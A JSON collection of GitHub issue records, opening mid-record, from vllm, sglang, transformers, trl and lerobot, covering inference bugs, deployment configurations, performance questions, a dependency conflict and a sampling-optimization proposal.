self.ngram_size])\n if ngram[:-1] == current_prefix:\n banned_tokens.add(ngram[-1])\n \n banned_tokens = banned_tokens - self.whitelist_token_ids\n \n if banned_tokens:\n scores = scores.clone()\n for token in banned_tokens:\n scores[token] = -float(\"inf\")\n \n return scores\n\n\n\n async def stream_generate(image=None, prompt=''):\n logits_processors = [NoRepeatNGramLogitsProcessor(ngram_size=30, window_size=90,\n whitelist_token_ids={128821, 128822})] # whitelist: , \n # newer-version style\n logits_processors_config: list[Dict[str, Any]] = [\n {\n \"class\": NoRepeatNGramLogitsProcessor, # pass the class object\n \"kwargs\": { # constructor kwargs\n \"ngram_size\": 30,\n \"window_size\": 90,\n \"whitelist_token_ids\": {128821, 128822}\n }\n }\n ]\n \n engine_args = AsyncEngineArgs(\n model=MODEL_PATH,\n #hf_overrides={\"architectures\": [\"DeepseekOCRForCausalLM\"]},\n block_size=256,\n max_model_len=8192,\n enforce_eager=False,\n trust_remote_code=True, \n tensor_parallel_size=1,\n gpu_memory_utilization=0.75,\n logits_processors=logits_processors_config\n )\n engine = AsyncLLMEngine.from_engine_args(engine_args)\n \n\nerror:\n\n\".local/lib/python3.13/site-packages/vllm/engine/arg_utils.py\", line 1189, in create_model_config\n return ModelConfig(\n model=self.model,\n ...<46 lines>...\n io_processor_plugin=self.io_processor_plugin,\n )\n File \"/.local/lib/python3.13/site-packages/pydantic/_internal/_dataclasses.py\", line 121, in __init__\n s.__pydantic_validator__.validate_python(ArgsKwargs(args, kwargs), self_instance=s)\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\npydantic_core._pydantic_core.ValidationError: 2 validation errors for ModelConfig\nlogits_processors.0.str\n Input should be a valid string [type=string_type, input_value={'class': tag ", "body": "### Your current environment\n\nI am on docker nightly vLLM API server version 0.14.0rc1.dev104+g8ee90c83f\n\n\n### \ud83d\udc1b Describe the bug\n\n\nI hosted the model via vLLM without a reasoning_parser, and found that the model starts its output directly, without the opening think tag, but emits the closing tag later. \n\n```\nroot@iv-ydzbs5zshss6ipm6s5gu /h/n/d/ark_http_proxy# curl --location 'http://localhost/v1/chat/completions' \\\n --header 'Authorization: Bearer YOUR_API_KEY' \\\n --header 'Content-Type: application/json' \\\n --data '{\n \"model\": \"GLM-4.7-FP8\", \"stream\": true,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"what is cryptography\"\n }\n ],\"chat_template_kwargs\": {\"enable_thinking\": true}, \"skip_special_tokens\": false,\n \"thinking\": {\n \"type\": \"enabled\"\n },\n \"max_tokens\": 1024,\n \"temperature\": 1.0\n }'\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"role\":\"assistant\",\"content\":\"\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null}],\"prompt_token_ids\":null}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"1\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\". 
\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\" **An\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"alyze the\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n```\nI confirmed that chat template will \n\n```\nroot@iv-ydzbs5zshss6ipm6s5gu /h/n/d/ark_http_proxy# curl -sS 'http://127.0.0.1/tokenize' \\\n -H 'Content-Type: application/json' \\\n -d '{\"model\":\"GLM-4.7-FP8\",\"messages\":[{\"role\":\"user\",\"content\":\"hi\"}],\"add_generation_prompt\":true,\"return_token_strs\":true}'\n{\"count\":6,\"max_model_len\":202752,\"tokens\":[151331,151333,151336,6023,151337,151350],\"token_strs\":[\"[gMASK]\",\"\",\"<|user|>\",\"hi\",\"<|assistant|>\",\"\"]}\u23ce \n```\n\n\nI think we need a similar **minimax_m2_append_think** reasoning parser to simply append think to content beginning?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31319", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-24T18:45:34Z", "updated_at": "2026-01-06T07:59:45Z", "comments": 16, "user": "Nemo-G" }, { "repo": "vllm-project/vllm", "number": 31278, "title": "[Usage]:\u8bf7\u95eeQwen3-VL\u672c\u5730\u52a0\u8f7d\u6a21\u5f0f\u652f\u6301\u5355\u72ec\u52a0\u8f7dLoRA\u4e48\uff1f", "body": "\u8bf7\u95eeQwen3-VL\u672c\u5730\u52a0\u8f7d\u6a21\u5f0f\u652f\u6301\u5355\u72ec\u52a0\u8f7dLoRA\u4e48\uff1f", "url": "https://github.com/vllm-project/vllm/issues/31278", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-24T11:33:08Z", "updated_at": "2025-12-25T03:52:16Z", "comments": 3, "user": "dengdeng-cat" }, { "repo": "vllm-project/vllm", "number": 31272, "title": "[Performance]: b200x8 deepseek-ai/DeepSeek-V3.2-Exp max perf", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\nDo you have any ideas on how to increase TPS? I have two servers \u2014 one with H200 \u00d78 and another with B200 \u00d78. They use the same startup script, but the performance is almost identical. 
In my opinion, B200 should be faster than H200, so maybe my settings are not optimal\nvllm serve \\\n --model deepseek-ai/DeepSeek-V3.2-Exp \\\n --served-model-name deepseek-ai/DeepSeek-V3.2-Exp \\\n --host 0.0.0.0 \\\n --port 12345 \\\n --tensor-parallel-size 8 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v31 \\\n --chat-template /root/tool_chat_template_deepseekv31.jinja \\\n --gpu-memory-utilization 0.9 \\\n --max-model-len 125000 \\\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 13.0.88\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 580.95.05\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.14.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.14.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 240\nOn-line CPU(s) list: 0-239\nVendor ID: AuthenticAMD\nBIOS Vendor ID: QEMU\nModel name: AMD EPYC 9575F 64-Core Processor\nBIOS Model name: pc-q35-8.2 CPU @ 2.0GHz\nBIOS CPU family: 1\nCPU family: 26\nModel: 2\nThread(s) per core: 1\nCore(s) per socket: 1\nSocket(s): 240\nStepping: 1\nBogoMIPS: 6590.10\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw perfctr_core ssbd ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 clzero xsaveerptr wbnoinvd arat npt lbrv nrip_save 
tsc_scale vmcb_clean flushbyasid pausefilter pfthreshold v_vmsave_vmload vgif vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid movdiri movdir64b fsrm avx512_vp2intersect flush_l1d arch_capabilities\nVirtualization: AMD-V\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 15 MiB (240 instances)\nL1i cache: 15 MiB (240 instances)\nL2 cache: ", "url": "https://github.com/vllm-project/vllm/issues/31272", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-24T09:48:01Z", "updated_at": "2025-12-24T10:09:29Z", "comments": 0, "user": "evgeniiperepelkin" }, { "repo": "huggingface/trl", "number": 4747, "title": "Addition of Supervised Reinforcement Learning", "body": "### Feature request\n\nhttps://arxiv.org/pdf/2510.25992 Can I work on its implementation?\n\n### Motivation\n\nA better approach than previous RL methods.\n\n### Your contribution\n\nI can work on it, following the reference paper. ", "url": "https://github.com/huggingface/trl/issues/4747", "state": "open", "labels": [], "created_at": "2025-12-24T09:20:32Z", "updated_at": "2025-12-24T09:20:32Z", "comments": 0, "user": "kushalgarg101" }, { "repo": "vllm-project/vllm", "number": 31270, "title": "[Bug]: Can speculative decoding run with PP >= 2?", "body": "### Your current environment\n\nvllm:0.12.0\n\n### \ud83d\udc1b Describe the bug\n\nI run vLLM 0.12.0 with start args like this: \n`python3 -m vllm.entrypoints.openai.api_server \\\n--host 0.0.0.0 --port 8080 --dtype bfloat16 --model /Qwen3-32B \\\n--pipeline-parallel-size 2 \\\n--gpu-memory-utilization 0.9 --max-model-len 32768 --max-num-batched-tokens 5120 \\\n--trust-remote-code --no-enable-prefix-caching \\\n--speculative_config '{\"method\": \"ngram\",\"num_speculative_tokens\": 10,\"prompt_lookup_max\": 4, \"enforce_eager\": \"True\"}'`\nThe server starts, but when the '/chat/completions' endpoint is called, the vLLM server crashes.\n\n### Before submitting a new issue...\n\n- [ ] #31271", "url": "https://github.com/vllm-project/vllm/issues/31270", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-24T09:10:05Z", "updated_at": "2025-12-26T07:27:11Z", "comments": 1, "user": "frankie-ys" }, { "repo": "sgl-project/sglang", "number": 15739, "title": "[Bug] Failed to deploy DeepSeek-V3.2 with LMCache", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. 
Otherwise, it will be closed.\n\n### Describe the bug\n\nI use v0.5.6.post2 with LMCache 0.3.10 to deploy DeepSeek-V3.2.\nI got the following error :\n```\n[2025-12-24 08:20:12 PP0 TP2 EP2] Scheduler hit an exception: Traceback (most recent call last):\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 2680, in run_scheduler_process\n scheduler = Scheduler(\n ^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 434, in __init__\n self.init_cache_with_memory_pool()\n File \"/sgl-workspace/sglang/python/sglang/srt/managers/scheduler.py\", line 781, in init_cache_with_memory_pool\n self.tree_cache = LMCRadixCache(\n ^^^^^^^^^^^^^^\n File \"/sgl-workspace/sglang/python/sglang/srt/mem_cache/storage/lmcache/lmc_radix_cache.py\", line 91, in __init__\n getattr(self.token_to_kv_pool_allocator._kvcache, \"k_buffer\"),\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nAttributeError: 'NSATokenToKVPool' object has no attribute 'k_buffer'. Did you mean: 'kv_buffer'?\n```\n\nIs there anything wrong with my configuration? Please advise.\nThanks~\n\n### Reproduction\n\nMy configs:\n\n> lmcache_config.yaml\n```\nchunk_size: 256\n\nlocal_cpu: true\nmax_local_cpu_size: 5.0\n#\nremote_url: \"redis://10.62.207.53:32628\"\nremote_serde: \"naive\"\n```\n\n> master.sh\n```\nexport LMCACHE_CONFIG_PATH=/mnt/scripts/lmcache_config.yaml \nexport LMCACHE_ENABLE=True\npython -m sglang.launch_server \\\n --model-path=/mnt/models/deepseek-ai/DeepSeek-V3.2 \\\n --served-model-name=deepseek-ai/DeepSeek-V3.2 \\\n --tensor-parallel-size=4 \\\n --pipeline-parallel-size=2 \\\n --expert-parallel-size=4 \\\n --data-parallel-size=1 \\\n --enable-dp-attention \\\n --trust-remote-code \\\n --mem-fraction-static=0.8 \\\n --log-requests \\\n --log-requests-level=3 \\\n --dist-init-addr=\"${MASTER_IP}:${PORT}\" \\\n --nnodes=\"$NNODES\" \\\n --node-rank=\"$NODE_RANK\" \\\n --tool-call-parser=deepseekv32 \\\n --reasoning-parser=deepseek-v3 \\\n --host=0.0.0.0 \\\n --port=8000 \\\n --enable-lmcache \\\n --enable-metrics\n```\n\n> worker.sh\n```\nexport LMCACHE_CONFIG_PATH=/mnt/scripts/lmcache_config.yaml \nexport LMCACHE_ENABLE=True\npython -m sglang.launch_server \\\n --model-path=/mnt/models/deepseek-ai/DeepSeek-V3.2 \\\n --served-model-name=deepseek-ai/DeepSeek-V3.2 \\\n --tensor-parallel-size=4 \\\n --pipeline-parallel-size=2 \\\n --expert-parallel-size=4 \\\n --data-parallel-size=1 \\\n --enable-dp-attention \\\n --trust-remote-code \\\n --mem-fraction-static=0.8 \\\n --log-requests \\\n --log-requests-level=3 \\\n --dist-init-addr=\"${MASTER_IP}:${PORT}\" \\\n --nnodes=\"$NNODES\" \\\n --node-rank=\"$NODE_RANK\" \\\n --tool-call-parser=deepseekv32 \\\n --reasoning-parser=deepseek-v3 \\\n --enable-lmcache \\\n --enable-metrics\n```\n\n### Environment\n\nsglang: v0.5.6.post2 \nlmcache: v0.3.10 \nmodel: DeepSeek-V3.2", "url": "https://github.com/sgl-project/sglang/issues/15739", "state": "open", "labels": [], "created_at": "2025-12-24T08:45:29Z", "updated_at": "2025-12-29T22:55:27Z", "comments": 1, "user": "niceallen" }, { "repo": "sgl-project/sglang", "number": 15710, "title": "[Bug] Using TBO, but no overlap in decoding phase?", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a 
discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\n\n\n### Reproduction\n\npython -m sglang.launch_server --model-path /root/temp_can/DeepSeek-V3-0324 --load-format dummy --tp 4 --ep 4 --moe-a2a-backend deepep --deepep-mode auto --chunked-prefill-size -1 --host 0.0.0.0 --port 30000 --enable-two-batch-overlap --mem-fraction-static 0.4\n\npython3 -m sglang.bench_one_batch_server --model-path /root/temp_can/DeepSeek-V3-0324 --base-url http://127.0.0.1:30000 --batch-size 256 --input-len 64 --output-len 128 --skip-warmup --profile\n\n### Environment\n\n(new_py310) root@zyhuang0-0:~/temp_can/sglang# python3 -m sglang.check_env\nPython: 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0]\nCUDA available: True\nGPU 0,1: NVIDIA H100 80GB HBM3\nGPU 0,1 Compute Capability: 9.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.41\nCUDA Driver Version: 550.54.15\nPyTorch: 2.9.1+cu128\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.2.6\naiohttp: 3.13.2\nfastapi: 0.127.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n GPU0 GPU1 NIC0 NIC1 NIC2 NIC3 NIC4 NIC5 NIC6 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X NV18 SYS PIX SYS SYS SYS SYS SYS 0-47,96-143 0 N/A\nGPU1 NV18 X SYS SYS SYS SYS SYS PIX SYS 48-95,144-191 1 N/A\nNIC0 SYS SYS X SYS SYS SYS SYS SYS SYS\nNIC1 PIX SYS SYS X SYS SYS SYS SYS SYS\nNIC2 SYS SYS SYS SYS X PXB PXB SYS SYS\nNIC3 SYS SYS SYS SYS PXB X PIX SYS SYS\nNIC4 SYS SYS SYS SYS PXB PIX X SYS SYS\nNIC5 SYS PIX SYS SYS SYS SYS SYS X SYS\nNIC6 SYS SYS SYS SYS SYS SYS SYS SYS X \n\nLegend:\n\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n\nNIC Legend:\n\n NIC0: mlx5_0\n NIC1: mlx5_1\n NIC2: mlx5_2\n NIC3: mlx5_3\n NIC4: mlx5_4\n NIC5: mlx5_5\n NIC6: mlx5_6\n\n\nulimit soft: 1048576", "url": "https://github.com/sgl-project/sglang/issues/15710", "state": "open", "labels": [], "created_at": "2025-12-24T02:22:19Z", "updated_at": "2025-12-24T02:22:19Z", "comments": 0, "user": "ziyuhuang123" }, { "repo": "sgl-project/sglang", "number": 15707, "title": "[Feature] diffusion: TurboDiffusion achieves a 200x speedup on a single GPU, bringing video into the second-level era", "body": "### Checklist\n\n- [ ] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. 
Otherwise, it will be closed.\n\n### Motivation\n\nhttps://github.com/thu-ml/TurboDiffusion\n\nWhen can it be integrated into sglang-diffusion?\n\n> [A Tsinghua-affiliated DeepSeek moment arrives and Silicon Valley is buzzing: 200x speedup on a single GPU brings video into the second-level era](https://mp.weixin.qq.com/s/JmHwMsCYr9M39JLy1jAb7A)\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15707", "state": "open", "labels": [], "created_at": "2025-12-24T01:50:02Z", "updated_at": "2025-12-30T08:45:43Z", "comments": 1, "user": "xiaolin8" }, { "repo": "huggingface/transformers", "number": 43023, "title": "How to investigate \"CAS service error\" during model downloading?", "body": "### System Info\n\n\n(nm) PS C:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\Lib\\site-packages\\transformers\\commands> python .\\transformers_cli.py env\n\n```\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.57.3\n- Platform: Windows-10-10.0.19045-SP0\n- Python version: 3.10.19\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.7.0\n- Accelerate version: not installed\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.0 (NA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: the whole code posted below\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nBase example from [here](https://huggingface.co/cross-encoder/ms-marco-MiniLM-L6-v2) \n\n```\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport torch\n\nmodel = AutoModelForSequenceClassification.from_pretrained('cross-encoder/ms-marco-MiniLM-L6-v2')\ntokenizer = AutoTokenizer.from_pretrained('cross-encoder/ms-marco-MiniLM-L6-v2')\n\nfeatures = tokenizer(['How many people live in Berlin?', 'How many people live in Berlin?'], ['Berlin has a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.', 'New York City is famous for the Metropolitan Museum of Art.'], padding=True, truncation=True, return_tensors=\"pt\")\n\nmodel.eval()\nwith torch.no_grad():\n scores = model(**features).logits\n print(scores)\n```\n\nreturns\n\n```\nmodel.safetensors:\u2007\u2007\u20070%\n\u20070.00/90.9M\u2007[00:32 [1037](file:///C:/Users/myuser	/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/modeling_utils.py:1037) resolved_archive_file = cached_file(pretrained_model_name_or_path, filename, **cached_file_kwargs)\n 1039 # Since we set _raise_exceptions_for_missing_entries=False, we don't get an exception but a None\n 1040 # result when internet is up, the repo and revision exist, but the file does not.\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:322, in cached_file(path_or_repo_id, filename, **kwargs)\n 269 \"\"\"\n 270 Tries to locate a file in a local folder and repo, downloads and cache it if necessary.\n 271 \n (...)\n 320 ```\n 321 \"\"\"\n--> 
[322](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:322) file = cached_files(path_or_repo_id=path_or_repo_id, filenames=[filename], **kwargs)\n 323 file = file[0] if file is not None else file\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:567, in cached_files(path_or_repo_id, filenames, cache_dir, force_download, resume_download, proxies, token, revision, local_files_only, subfolder, repo_type, user_agent, _raise_exceptions_for_gated_repo, _raise_exceptions_for_missing_entries, _raise_exceptions_for_connection_errors, _commit_hash, **deprecated_kwargs)\n 566 elif not isinstance(e, EntryNotFoundError):\n--> [567](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:567) raise e\n 569 resolved_files = [\n 570 _get_cache_file_to_return(path_or_repo_id, filename, cache_dir, revision) for filename in full_filenames\n 571 ]\n\nFile c:\\Users\\myuser\\AppData\\Local\\anaconda3\\envs\\nm\\lib\\site-packages\\transformers\\utils\\hub.py:479, in cached_files(path_or_repo_id, filenames, cache_dir, force_download, resume_download, proxies, token, revision, local_files_only, subfolder, repo_type, user_agent, _raise_exceptions_for_gated_repo, _raise_exceptions_for_missing_entries, _raise_exceptions_for_connection_errors, _commit_hash, **deprecated_kwargs)\n 477 if len(full_filenames) == 1:\n 478 # This is slightly better for only 1 file\n--> [479](file:///C:/Users/myuser\t/AppData/Local/anaconda3/envs/nm/lib/site-packages/transformers/utils/hub.py:479) hf_hub_download", "url": "https://github.com/huggingface/transformers/issues/43023", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T14:48:51Z", "updated_at": "2025-12-25T14:36:42Z", "user": "satyrmipt" }, { "repo": "vllm-project/vllm", "number": 31217, "title": "[Usage]: suffix decoding", "body": "### Your current environment\n\nDoes suffix decoding necessarily require a repetition penalty of 1?\n\n### How would you like to use vllm\n\nDoes suffix decoding necessarily require a repetition penalty of 1?\nIn suffix decoding, I found that when the repetition penalty is not equal to 1, the acceleration is not significant. 
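A toy illustration of the likely mechanism (hedged: this assumes HF-style repetition-penalty semantics, not vLLM's exact kernel). Suffix decoding proposes continuations that repeat earlier context, and a penalty above 1 pushes down exactly those tokens in the target model, so the draft and target disagree and speculated tokens get rejected:

```python
import torch

logits = torch.tensor([2.0, 1.9, 0.5])  # token 0 is a repeated token a draft would propose
context = [0]                           # token 0 already appeared in the context

def apply_rep_penalty(logits: torch.Tensor, context: list[int], penalty: float) -> torch.Tensor:
    # HF-style repetition penalty: divide positive logits, multiply negative ones.
    out = logits.clone()
    for t in set(context):
        out[t] = out[t] / penalty if out[t] > 0 else out[t] * penalty
    return out

print(apply_rep_penalty(logits, context, 1.0).argmax().item())  # 0 -> draft token accepted
print(apply_rep_penalty(logits, context, 1.2).argmax().item())  # 1 -> draft token rejected
```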
However, when the repetition penalty is equal to 1, the acceleration is very noticeable.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31217", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-23T10:43:45Z", "updated_at": "2025-12-24T02:56:35Z", "comments": 1, "user": "jiangix-paper" }, { "repo": "huggingface/lerobot", "number": 2707, "title": "Transformers dependency", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- lerobot version: 0.4.3\n- Platform: Linux-5.14.0-570.26.1.el9_6.x86_64-x86_64-with-glibc2.34\n- Python version: 3.12.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.3.5\n- PyTorch version: 2.7.1\n- Is PyTorch built with CUDA support?: False\n- Cuda version: N/A\n- GPU model: N/A\n- Using GPU in script?: \n```\n\n### Description\n\nHi, \n\nSince commit f04958527e70cac3aa95265badd97b53f3ef7633 and the dependency bump of transformers from 4.53 to 4.57, some extras are conflicting (pi requires a custom 4.53, and almost all others require >=4.57), so I can't upgrade. Was the bump really necessary? Or is there a possibility to get rid of the custom openpi transformers?\n\n### Context & Reproduction\n\n[pypi-dependencies]\nlerobot = {git = \"https://github.com/huggingface/lerobot.git\", extras = [\"smolvla\", \"pi\", \"groot\"]}\n\npixi install\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2707", "state": "closed", "labels": [ "bug", "question", "dependencies" ], "created_at": "2025-12-23T10:37:53Z", "updated_at": "2025-12-23T23:43:10Z", "user": "RomDeffayet" }, { "repo": "vllm-project/vllm", "number": 31216, "title": "[RFC]: Sampling Optimization: move gather of logits after argmax.", "body": "### Motivation.\n\nAs shown in the left part of the following picture, in the original sampling procedure we perform `llm_head` and `gather` first, then perform `argmax` on the full `logits`. However, we can in fact move `gather` after `argmax` to reduce both the communication volume of `gather` and the computation load of `argmax`.\n\n\"Image\"\n\nTest results during the stress-testing phase show that this feature can reduce the `logits_processor + sampler` time consumption by more than 200 us in certain scenarios. In speculative decoding scenarios, where multiple rounds of post-processing are required for each step, the benefits of this feature become even more pronounced. So I think this is an important optimization, especially as eagle3 becomes more and more popular. Later I will propose a PR to implement this.\n\n### Proposed Change.\n\n1. Remove the `gather/all_gather` operation from logits processor.\n2. Add two `gather/all_gather` operations to sampler to gather both max value and max index of `argmax`. 
